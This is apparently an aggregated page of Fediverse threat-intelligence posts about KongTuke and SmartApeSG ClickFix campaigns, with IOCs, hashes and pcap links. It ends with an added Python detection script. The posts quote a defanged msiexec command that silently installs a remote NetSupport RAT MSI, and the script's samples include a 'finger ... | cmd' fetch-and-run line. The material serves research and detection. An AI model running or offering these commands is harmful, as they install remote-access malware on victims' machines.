#kongtuke — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #kongtuke, aggregated by home.social.
-
2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG
Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553
Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.
-
NOTE: This has been updated to correct the malware names. Thanks, @netresec!
2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT
Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.
A #pcap of the infection traffic, some artifacts, and further details are available at https://www.malware-traffic-analysis.net/2026/02/02/index.html
-
2026-01-08 (Thursday): Got a full infection from #KongTuke campaign #ClickFix activity today.
I split the traffic from this infection into two #pcap files, and the second one is over 200 MB, because of the malware download.
Pcap files, the associated malware, artifacts, and further information are available at https://www.malware-traffic-analysis.net/2026/01/08/index.html
-
I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html
I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.
I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.
Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.
It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.
-
2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.
While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.
#clipboardhijacking Script injected into clipboard:
msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn
The downloaded file is an MSI for #NetSupportRAT
https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
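The two ClickFix command shapes mentioned in these posts, the "finger" variant (2025-12-11 and 2026-02-02 posts) and the FileFix-style msiexec line quoted above, are both things an endpoint team would want to catch in process-creation telemetry. Below is an added example of that detection logic; it is not code from the poster or from malware-traffic-analysis.net. The only command line taken from the page is the defanged msiexec line; the other sample command lines, the 203.0.113.10 address, and the rule names are constructed for illustration.

```python
import re
from typing import List, Tuple

# Refang defanged indicators (hxxps, [:], [.]) so IOCs copied from reports
# can be matched against the command lines a real EDR would record.
def refang(text: str) -> str:
    return (text.replace("hxxps", "https").replace("hxxp", "http")
                .replace("[:]", ":").replace("[.]", "."))

# Rule 1: msiexec installing a package straight from an http(s) URL, the
# FileFix pattern quoted on this page ("msiexec /i https://... /qn").
MSIEXEC_REMOTE = re.compile(r"\bmsiexec(?:\.exe)?\b.*?[/-]i\s+https?://", re.I)
# Quiet/no-UI install flags, which a user-driven ClickFix paste almost always carries.
QUIET = re.compile(r"\s/q[nb]?\b", re.I)
# Rule 2: finger output piped into a shell, the "finger" ClickFix variant
# (finger fetches the payload text from a remote host, cmd executes it).
FINGER_PIPED = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+.*?\|\s*(?:cmd|powershell|pwsh)", re.I)
# Rule 3: any finger user@host query; lower confidence but rare on desktops.
FINGER_ANY = re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.I)

# Hypothetical rule names; an EDR would map these to its own alert taxonomy.
def classify(cmdline: str) -> List[str]:
    line = refang(cmdline)
    hits: List[str] = []
    if MSIEXEC_REMOTE.search(line):
        hits.append("msiexec_remote_msi")
        if QUIET.search(line):
            hits.append("msiexec_quiet")
    if FINGER_PIPED.search(line):
        hits.append("finger_piped_to_shell")
    elif FINGER_ANY.search(line):
        hits.append("finger_remote_query")
    return hits

def scan(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return only the command lines that triggered at least one rule."""
    results = []
    for cmd in cmdlines:
        hits = classify(cmd)
        if hits:
            results.append((cmd, hits))
    return results

# Constructed sample process-creation command lines. The first is the
# defanged line quoted in the post above; the rest are made up for this example.
SAMPLE_CMDLINES = [
    "msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn",
    'cmd.exe /c "finger lookup@203.0.113.10 | cmd"',            # constructed finger ClickFix
    r"msiexec /i C:\Users\Public\setup.msi /qn",                  # constructed benign local install
    "finger admin@203.0.113.10",                                  # constructed, query only
]

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(hits):28s} {cmd}")
```

The rules key on the shape of the command rather than on the domain, since the hosts rotate; the defanged indicator from the post is refanged only so that it can be matched the way the live command line would appear in telemetry.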